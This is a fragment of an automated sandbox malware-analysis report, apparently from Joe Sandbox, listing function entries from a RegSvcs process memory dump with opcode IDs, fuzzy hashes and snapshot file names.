                                            • Instruction Fuzzy Hash: 18D0677AB510189FCB049F98E8408DDB7B6FF9C222B048116E925A3265C6319961DB60
                                            Function 03035EA8 Relevance: .0, Instructions: 16COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2313491691.0000000003030000.00000040.00000800.00020000.00000000.sdmp, Offset: 03030000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_3030000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 64f65e3cd4c36efa94a3e52eea05c43e13f4f92b8af3a80028bc94ab208636c6
                                            • Instruction ID: 4aa4b9ec95554c45af87ac5c0c71bedaa0a06ea8e6ee4d14433ec80e78dd0b9a
                                            • Opcode Fuzzy Hash: 64f65e3cd4c36efa94a3e52eea05c43e13f4f92b8af3a80028bc94ab208636c6
                                            • Instruction Fuzzy Hash: 00D0C770108B8A0BC702B736E8550243F29EE91204B844AE5B8094A05BEABD188A8BA2
                                            Function 03035EB8 Relevance: .0, Instructions: 12COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2313491691.0000000003030000.00000040.00000800.00020000.00000000.sdmp, Offset: 03030000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_3030000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 83511e25c2acf5e4412e2951c5536781c393245ec933b1f88289d90b7fb5bdb2
                                            • Instruction ID: f9c207c7e6803b0d80d3ed1bd54985f30b56485d23d265650320157243910426
                                            • Opcode Fuzzy Hash: 83511e25c2acf5e4412e2951c5536781c393245ec933b1f88289d90b7fb5bdb2
                                            • Instruction Fuzzy Hash: EBC01270104B0B47C506FB76ED455157B2EFFD0200F804950B01A0615EDEBC2CC58AA6

                                            Non-executed Functions

                                            Function 03036088 Relevance: 5.0, Strings: 4, Instructions: 49COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2313491691.0000000003030000.00000040.00000800.00020000.00000000.sdmp, Offset: 03030000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_3030000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: \;cq$\;cq$\;cq$\;cq
                                            • API String ID: 0-2961067002
                                            • Opcode ID: dca0a2191fc3b9f9de572c47ea6e7fe153a39282f84c578589c05598b5aea3be
                                            • Instruction ID: e30047de44cec229414b47697bcf1a2bd1b58f53637f95446bbd276747e8e8ad
                                            • Opcode Fuzzy Hash: dca0a2191fc3b9f9de572c47ea6e7fe153a39282f84c578589c05598b5aea3be
                                            • Instruction Fuzzy Hash: 3D019A31711018AFCB64CA2CC4819AB77EEAFCA66032941AAE102CB2B4DB73DC418790